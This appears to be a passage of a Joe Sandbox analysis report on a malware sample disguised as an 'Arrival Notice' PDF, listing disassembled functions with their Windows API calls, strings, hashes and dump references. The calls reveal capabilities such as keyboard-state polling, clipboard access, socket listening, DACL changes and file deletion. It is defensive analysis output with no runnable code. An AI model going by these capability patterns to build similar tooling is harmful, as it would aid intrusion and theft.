SetCurrentDirectoryW.KERNEL32(?), ref: 00290AFF
_wcscpy.LIBCMT ref: 00290B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00290B4A

Strings

*.*, xrefs: 00290B05

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: f63b9df10ea8909719837a633e1a4b3fef4515e0c8b7cb0a3a7049312ad6ae1e
Instruction ID: 97bf01418150f033c35c70c8639b22cf05309cb749cd1ebd448f43989ede7122
Opcode Fuzzy Hash: f63b9df10ea8909719837a633e1a4b3fef4515e0c8b7cb0a3a7049312ad6ae1e
Instruction Fuzzy Hash: EA615A725243059FDB10EF60C88499EB3E8FF89714F04496AF989C7252DB31EA65CF92

Function 00246F07 Relevance: 22.1, Strings: 17, Instructions: 883COMMON

Download Yara Rule

Strings

ANY), xrefs: 002C2E60
UTF), xrefs: 002C2C7C
NO_START_OPT), xrefs: 002C2CD1
LIMIT_RECURSION=, xrefs: 002C2D7E
CR), xrefs: 002C2E09
LF), xrefs: 002C2E26
CRLF), xrefs: 002C2E43
UCP), xrefs: 002C2C8F
UTF16), xrefs: 002C2C56
T./, xrefs: 002C2E57, 002C2F2A
LIMIT_MATCH=, xrefs: 002C2CF2
... ., xrefs: 00247096, 0024709C
NO_AUTO_POSSESS), xrefs: 002C2CB0
BSR_ANYCRLF), xrefs: 002C2EA0
BSR_UNICODE), xrefs: 002C2EBA
ANYCRLF), xrefs: 002C2E7D
., xrefs: 00246F77

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID: .$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$T./$UCP)$UTF)$UTF16)$... .
API String ID: 0-456088455
Opcode ID: c29d37150af0bce5aabd66ebbdd6d6a969b8e980e83c597e5d902a22b3000619
Instruction ID: 4021ea9553aabdf0717550e57fe4367f91267ebb0519690ebf673a1668892988
Opcode Fuzzy Hash: c29d37150af0bce5aabd66ebbdd6d6a969b8e980e83c597e5d902a22b3000619
Instruction Fuzzy Hash: E6726071E2421ADBDB18DF58C880BBEB7B5BF44310F14816AE919EB280DB709E55DF90

Function 0027A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0027ABD7
Part of subcall function 0027ABBB: GetLastError.KERNEL32(?,0027A69F,?,?,?), ref: 0027ABE1
Part of subcall function 0027ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0027A69F,?,?,?), ref: 0027ABF0
Part of subcall function 0027ABBB: HeapAlloc.KERNEL32(00000000,?,0027A69F,?,?,?), ref: 0027ABF7
Part of subcall function 0027ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0027AC0E

Part of subcall function 0027AC56: GetProcessHeap.KERNEL32(00000008,0027A6B5,00000000,00000000,?,0027A6B5,?), ref: 0027AC62
Part of subcall function 0027AC56: HeapAlloc.KERNEL32(00000000,?,0027A6B5,?), ref: 0027AC69
Part of subcall function 0027AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0027A6B5,?), ref: 0027AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0027A6D0
_memset.LIBCMT ref: 0027A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0027A704
GetLengthSid.ADVAPI32(?), ref: 0027A715
GetAce.ADVAPI32(?,00000000,?), ref: 0027A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0027A76E
GetLengthSid.ADVAPI32(?), ref: 0027A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0027A79A
HeapAlloc.KERNEL32(00000000), ref: 0027A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0027A7C2
CopySid.ADVAPI32(00000000), ref: 0027A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0027A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0027A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0027A834

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: f5b134b718eb8b0d18f5a37d4c50ef95497bb77863a44eef4f84dfa7b7de1a9c
Instruction ID: cd70b9051c86d087e086ed2c5b2f7a4fa81ea1c78c33c1561faba260574d33a8
Opcode Fuzzy Hash: f5b134b718eb8b0d18f5a37d4c50ef95497bb77863a44eef4f84dfa7b7de1a9c
Instruction Fuzzy Hash: BB516E7191020AAFDF04DF95DC49EEEBBB9FF44310F048129F919A7290D7349A15CB61

Function 002863F9 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

_wcscat.LIBCMT ref: 00286441
__wsplitpath.LIBCMT ref: 0028645F
FindFirstFileW.KERNEL32(?,?), ref: 00286474
_wcscpy.LIBCMT ref: 002864A3
_wcscat.LIBCMT ref: 002864B8
_wcscat.LIBCMT ref: 002864CA
DeleteFileW.KERNEL32(?), ref: 002864DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 002864EB
FindClose.KERNEL32(00000000), ref: 00286506

Strings

\*.*, xrefs: 0028643B

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*
API String ID: 2643075503-1173974218
Opcode ID: 0be313519a1ba99d48ad1fe50431d91cf0873bcb3eb0cda48bfdfccae5e3831d
Instruction ID: d266ddc21cd8c0391c0bae64785ba47f6dbd62a040e887f06be11ea9c03982f9
Opcode Fuzzy Hash: 0be313519a1ba99d48ad1fe50431d91cf0873bcb3eb0cda48bfdfccae5e3831d
Instruction Fuzzy Hash: 5E31D4B24193849AC321EFA48888EDFB7DCAF55310F44092EF6D8C3181EA35D5598BA7

Function 002A31BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A328E

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 002A332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 002A33C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 002A3604
RegCloseKey.ADVAPI32(00000000), ref: 002A3611

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: 5b25b67c2f2960872db1cb1a13d87ece6c17fae02367c34fe8f1111100b2ae8d
Instruction ID: 31aaf682d1bac1aea0a7ca5e1c8a385197034ff5134d00d11e99c03497a11d80
Opcode Fuzzy Hash: 5b25b67c2f2960872db1cb1a13d87ece6c17fae02367c34fe8f1111100b2ae8d
Instruction Fuzzy Hash: B3E14A71614201AFCB14DF28C995E2ABBE8FF89710B14846DF94ADB2A1DB30ED15CF51

Function 00282B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00282B5F
GetAsyncKeyState.USER32(000000A0), ref: 00282BE0
GetKeyState.USER32(000000A0), ref: 00282BFB
GetAsyncKeyState.USER32(000000A1), ref: 00282C15
GetKeyState.USER32(000000A1), ref: 00282C2A
GetAsyncKeyState.USER32(00000011), ref: 00282C42
GetKeyState.USER32(00000011), ref: 00282C54
GetAsyncKeyState.USER32(00000012), ref: 00282C6C
GetKeyState.USER32(00000012), ref: 00282C7E
GetAsyncKeyState.USER32(0000005B), ref: 00282C96
GetKeyState.USER32(0000005B), ref: 00282CA8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 95a05020c0b7b85194bf790c82e63476c637dcbf4fd1f72713bf4f2690850638
Instruction ID: bb0bd12fe072a61990994b3e9055561330ff15a4309ead15c712e855c3a94b5a
Opcode Fuzzy Hash: 95a05020c0b7b85194bf790c82e63476c637dcbf4fd1f72713bf4f2690850638
Instruction Fuzzy Hash: 5C41E9385167CBADFF30BF6089047B9BEA06F11348F44805ED5C6562C2DBA499ECC7A2

Function 00296D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00296D2E
EmptyClipboard.USER32 ref: 00296D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00296D49
CloseClipboard.USER32 ref: 00296DE8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: a47ab57651c2418ed662f9fcfd991e2b6db119a3d3028f451802ad430d5e5d4d
Instruction ID: 4511a902517d828d001c1c5c64b174c57737c8c514806e9ac8678525880b75b9
Opcode Fuzzy Hash: a47ab57651c2418ed662f9fcfd991e2b6db119a3d3028f451802ad430d5e5d4d
Instruction Fuzzy Hash: 63218B31320110AFDB11AF64EC4DF2D77E8EF44B11F14842AF94A9B2A1CB70E911CB65

Function 0029C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON

Download Yara Rule

APIs

Part of subcall function 00279ABF: CLSIDFromProgID.OLE32 ref: 00279ADC
Part of subcall function 00279ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00279AF7
Part of subcall function 00279ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00279B05
Part of subcall function 00279ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00279B15

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0029C235
_memset.LIBCMT ref: 0029C242
_memset.LIBCMT ref: 0029C360
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0029C38C
CoTaskMemFree.OLE32(?), ref: 0029C397

Strings

NULL Pointer assignment, xrefs: 0029C3E5

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 519c35d397d142c1217b6117075c8132ae94dc791bb2c790776fae8b500bc219
Instruction ID: c2b9213d8e48df332720767b4d5577a6a0271a3f3a8dd48478f312e88e22e132
Opcode Fuzzy Hash: 519c35d397d142c1217b6117075c8132ae94dc791bb2c790776fae8b500bc219
Instruction Fuzzy Hash: A9915C71D10218ABDF10DF94DC85EEEBBB8EF04710F20816AF919A7291DB709A55CFA0

Function 002879D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 0027B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0027B180
Part of subcall function 0027B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0027B1AD
Part of subcall function 0027B134: GetLastError.KERNEL32 ref: 0027B1BA

ExitWindowsEx.USER32(?,00000000), ref: 00287A0F

Strings

SeShutdownPrivilege, xrefs: 002879DD
, xrefs: 002879FD
@, xrefs: 00287A02

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: 94df767bc9a6c3b8c6246f56262cdc029e9bd16ea5a22ac444bbb0a75b0078fb
Instruction ID: e06083c91df1be14826495b94987758cfaccf9ac8e4c6346f627fc09e370fe8d
Opcode Fuzzy Hash: 94df767bc9a6c3b8c6246f56262cdc029e9bd16ea5a22ac444bbb0a75b0078fb
Instruction Fuzzy Hash: CB01AC7967A2126AF72C7A64DC9AFBF72589B00740F344434FD43A20D2D5A1DE2083B4

Function 00249B60 Relevance: 9.8, Strings: 7, Instructions: 1055COMMON

Download Yara Rule

Strings

VUUU, xrefs: 00249ED4
VUUU, xrefs: 00249EA7
., xrefs: 00249CF3
ERCP, xrefs: 00249C32
VUUU, xrefs: 002CBE14
VUUU, xrefs: 00249E95
T./, xrefs: 002CBD50

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID: ERCP$T./$VUUU$VUUU$VUUU$VUUU$.
API String ID: 0-1559849951
Opcode ID: 195ceb9a6a73abdbe15c5c04437610ef27140718216bc44e6e700456fc84fa41
Instruction ID: 5f62625f24374ca082282541bc9d42c3e4d04ef23ab0c29a099dfc5ec43e5260
Opcode Fuzzy Hash: 195ceb9a6a73abdbe15c5c04437610ef27140718216bc44e6e700456fc84fa41
Instruction Fuzzy Hash: 8A92A471E2011ACBDF28CF58C841BAEB7B1BB54314F25829AD81AA7280D7719DE5CF91

Function 00298C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00298CA8
WSAGetLastError.WSOCK32(00000000), ref: 00298CB7
bind.WSOCK32(00000000,?,00000010), ref: 00298CD3
listen.WSOCK32(00000000,00000005), ref: 00298CE2
WSAGetLastError.WSOCK32(00000000), ref: 00298CFC
closesocket.WSOCK32(00000000,00000000), ref: 00298D10

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLast$bindclosesocketlistensocket
String ID:
API String ID: 1279440585-0
Opcode ID: 6133ec84d318036a70921080b0df4b71f1720bee08c6d86fd8a225a33272d9d7
Instruction ID: 7c168c79f0f3393e4b9b10ece61bc14ac9e360d92672434a665b1fcfa363e559
Opcode Fuzzy Hash: 6133ec84d318036a70921080b0df4b71f1720bee08c6d86fd8a225a33272d9d7
Instruction Fuzzy Hash: E32121316102019FCB14EF28DC88F2EB7A8FF4A720F148169F916A73D2CB70AD158B61

Function 00286532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00286554
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00286564
Process32NextW.KERNEL32(00000000,0000022C), ref: 00286583
__wsplitpath.LIBCMT ref: 002865A7
_wcscat.LIBCMT ref: 002865BA
CloseHandle.KERNEL32(00000000,?,00000000), ref: 002865F9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
String ID:
API String ID: 1605983538-0
Opcode ID: 509b067ce8be33fbae20bdb7d180810699e60ede7f25df46ea5644a00930c033
Instruction ID: 8c28d21028696b0bc213c60bd2a2635d11683b05dbc655cb52d9f6278d1ae679
Opcode Fuzzy Hash: 509b067ce8be33fbae20bdb7d180810699e60ede7f25df46ea5644a00930c033
Instruction Fuzzy Hash: 7B217175911219AFDB10AFA4DC8CFEAB7BCAB44300F5000A5E505D7181DBB59B95CF60

Function 002813CA Relevance: 8.1, APIs: 1, Strings: 4, Instructions: 560stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 002813DC

Strings

<2/, xrefs: 002816FA
(, xrefs: 00281422
,2/, xrefs: 002816B1
|, xrefs: 0028140C

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: lstrlen
String ID: ($,2/$<2/$|
API String ID: 1659193697-2989682679
Opcode ID: 0121d961d17014ef16da216893fc13dcd674ff0d5f0f0576c288d34b592c3493
Instruction ID: 5b055177bec05fd64038985706c24e387ebcc53aa3d054dd40eb8e18a5ff49c9
Opcode Fuzzy Hash: 0121d961d17014ef16da216893fc13dcd674ff0d5f0f0576c288d34b592c3493
Instruction Fuzzy Hash: E5323679A107059FC728DF29C48196AB7F4FF48310B11C46EE59ADB3A2E770E962CB44

Function 0029923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0029A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0029A84E

socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00299296
WSAGetLastError.WSOCK32(00000000,00000000), ref: 002992B9

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLastinet_addrsocket
String ID:
API String ID: 4170576061-0
Opcode ID: 26e6719902027b7ab19ef3dea0f3ae69f662fb2f78a60e6068b9ff9a0c2fefef
Instruction ID: 1d787332fc5ecd129a6ef735c9654a0e2d1950b95b505bb00c14f9f5ff00a1b6
Opcode Fuzzy Hash: 26e6719902027b7ab19ef3dea0f3ae69f662fb2f78a60e6068b9ff9a0c2fefef
Instruction Fuzzy Hash: CE41EE70610200AFDB14AF28C886E7EB7EDEF44B24F14855CF956AB2C2CB749D618B95

Function 0028EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0028EB8A
_wcscmp.LIBCMT ref: 0028EBBA
_wcscmp.LIBCMT ref: 0028EBCF
FindNextFileW.KERNEL32(00000000,?), ref: 0028EBE0
FindClose.KERNEL32(00000000,00000001,00000000), ref: 0028EC0E

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNext
String ID:
API String ID: 2387731787-0
Opcode ID: 508d2c979db1e23506bef6bc85e2b34d0387df383d863a75db3ae1630b38b369
Instruction ID: f4e9e9de4d5ab590d9f27ec6e8c3c39da03ef3417dfa76b002cb051f70eded4e
Opcode Fuzzy Hash: 508d2c979db1e23506bef6bc85e2b34d0387df383d863a75db3ae1630b38b369
Instruction Fuzzy Hash: 1741AF35610702CFCB08DF28C491A9AB7E4FF4A314F10455EE95A8B3A1DB71E964CF95

Function 002A8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 002A8160
IsWindowEnabled.USER32 ref: 002A816E
GetForegroundWindow.USER32(?,?,00000001), ref: 002A817B
IsIconic.USER32 ref: 002A8189
IsZoomed.USER32 ref: 002A8197

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
